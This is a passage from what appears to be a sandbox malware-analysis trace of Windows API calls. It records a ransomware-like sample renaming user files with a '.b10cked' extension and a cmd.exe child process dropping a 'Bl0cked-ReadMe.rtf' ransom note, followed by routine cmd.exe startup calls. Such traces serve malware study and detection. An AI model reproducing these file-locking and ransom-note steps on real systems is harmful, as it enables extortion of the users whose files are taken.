lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked", lpFilePart=0x0) returned 0x30 [0232.116] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx", nBufferLength=0x104, lpBuffer=0x20ec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx", lpFilePart=0x0) returned 0x28 [0232.116] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\1ub93z-ou.pptx")) returned 0x20 [0232.116] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\1ub93z-ou.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\1ub93z-ou.pptx.b10cked"), dwFlags=0x3) returned 1 [0232.117] FindClose (in: hFindFile=0x2f0ef8 | out: hFindFile=0x2f0ef8) returned 1 [0232.117] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20ec18 | out: _Buffer=" 1") returned 9 [0232.117] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.118] GetFileType (hFile=0x7) returned 0x2 [0232.144] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20eba4 | out: lpMode=0x20eba4) returned 1 [0232.145] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.145] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ebd8 | out: lpConsoleScreenBufferInfo=0x20ebd8) returned 1 [0232.148] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.148] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20ec18 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.148] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20ebfc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20ebfc*=0x1a) returned 1 [0232.151] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.151] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.174] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.174] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.175] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.175] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.176] SetConsoleInputExeNameW () returned 0x1 [0232.176] GetConsoleOutputCP () returned 0x1b5 [0232.177] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.177] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.192] exit (_Code=0) Process: id = "616" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16600" os_pid = "0x748" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34435 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34436 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34437 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34438 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 34439 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34440 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34441 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34442 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34443 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34444 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34759 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34760 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34761 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34762 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 34763 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 34764 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34765 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34766 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34767 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34768 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34769 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34770 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34771 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34772 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34773 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 34774 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34775 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34776 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34777 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 34778 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 34779 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 34780 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 34781 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 34782 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Thread: id = 856 os_tid = 0x9a8 [0232.426] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef8e4 | out: lpSystemTimeAsFileTime=0x1ef8e4*(dwLowDateTime=0xbe176d20, dwHighDateTime=0x1d440a9)) [0232.426] GetCurrentProcessId () returned 0x748 [0232.426] GetCurrentThreadId () returned 0x9a8 [0232.426] GetTickCount () returned 0x3ff06 [0232.426] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef8dc | out: lpPerformanceCount=0x1ef8dc*=28921537198) returned 1 [0232.427] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0232.427] __set_app_type (_Type=0x1) [0232.427] __p__fmode () returned 0x76b331f4 [0232.427] __p__commode () returned 0x76b331fc [0232.427] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0232.427] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0232.427] GetCurrentThreadId () returned 0x9a8 [0232.428] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9a8) returned 0x38 [0232.428] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.428] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0232.428] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.428] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0232.428] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef874 | out: phkResult=0x1ef874*=0x0) returned 0x2 [0232.428] VirtualQuery (in: lpAddress=0x1ef8ab, lpBuffer=0x1ef844, dwLength=0x1c | out: lpBuffer=0x1ef844*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.428] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1ef844, dwLength=0x1c | out: lpBuffer=0x1ef844*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0232.428] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1ef844, dwLength=0x1c | out: lpBuffer=0x1ef844*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0232.428] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1ef844, dwLength=0x1c | out: lpBuffer=0x1ef844*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.428] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1ef844, dwLength=0x1c | out: lpBuffer=0x1ef844*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.428] GetConsoleOutputCP () returned 0x1b5 [0232.429] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.429] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0232.429] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.429] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0232.429] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.429] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.429] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.429] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.430] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.430] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.430] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.430] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0232.430] GetEnvironmentStringsW () returned 0x260168* [0232.430] FreeEnvironmentStringsW (penv=0x260168) returned 1 [0232.430] GetEnvironmentStringsW () returned 0x260168* [0232.431] FreeEnvironmentStringsW (penv=0x260168) returned 1 [0232.431] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee7e4 | out: phkResult=0x1ee7e4*=0x40) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x90, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x1, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x1, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x0, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x40, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x40, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x40, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0232.431] RegCloseKey (hKey=0x40) returned 0x0 [0232.431] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee7e4 | out: phkResult=0x1ee7e4*=0x40) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x40, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x1, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x1, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x0, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x9, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x9, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x9, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0232.431] RegCloseKey (hKey=0x40) returned 0x0 [0232.431] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c0 [0232.432] srand (_Seed=0x5b8863c0) [0232.432] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0232.432] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0232.432] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.432] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2618c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0232.432] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0232.433] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0232.433] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.433] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0232.433] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0232.433] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0232.433] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0232.433] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0232.433] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0232.433] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0232.433] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0232.433] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0232.433] GetEnvironmentStringsW () returned 0x2622b8* [0232.433] FreeEnvironmentStringsW (penv=0x2622b8) returned 1 [0232.433] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.433] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.433] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0232.433] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0232.433] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0232.433] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0232.433] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0232.433] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0232.433] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0232.433] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0232.433] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef5b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.434] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef5b0, lpFilePart=0x1ef5ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef5ac*="Desktop") returned 0x18 [0232.434] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.434] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef32c | out: lpFindFileData=0x1ef32c) returned 0x25fff8 [0232.434] FindClose (in: hFindFile=0x25fff8 | out: hFindFile=0x25fff8) returned 1 [0232.434] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef32c | out: lpFindFileData=0x1ef32c) returned 0x25fff8 [0232.434] FindClose (in: hFindFile=0x25fff8 | out: hFindFile=0x25fff8) returned 1 [0232.434] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef32c | out: lpFindFileData=0x1ef32c) returned 0x25fff8 [0232.434] FindClose (in: hFindFile=0x25fff8 | out: hFindFile=0x25fff8) returned 1 [0232.435] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.435] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0232.435] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0232.435] GetEnvironmentStringsW () returned 0x262ad8* [0232.435] FreeEnvironmentStringsW (penv=0x262ad8) returned 1 [0232.435] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.436] GetConsoleOutputCP () returned 0x1b5 [0232.436] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.436] GetUserDefaultLCID () returned 0x409 [0232.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0232.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef6f0, cchData=128 | out: lpLCData="0") returned 2 [0232.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef6f0, cchData=128 | out: lpLCData="0") returned 2 [0232.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef6f0, cchData=128 | out: lpLCData="1") returned 2 [0232.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0232.437] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0232.438] GetConsoleTitleW (in: lpConsoleTitle=0x2508d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.438] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.438] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.438] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.438] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.439] _wcsicmp (_String1="type", _String2=")") returned 75 [0232.439] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0232.439] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0232.439] _wcsicmp (_String1="IF", _String2="type") returned -11 [0232.439] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0232.440] _wcsicmp (_String1="REM", _String2="type") returned -2 [0232.440] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0232.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.444] _get_osfhandle (_FileHandle=1) returned 0x7 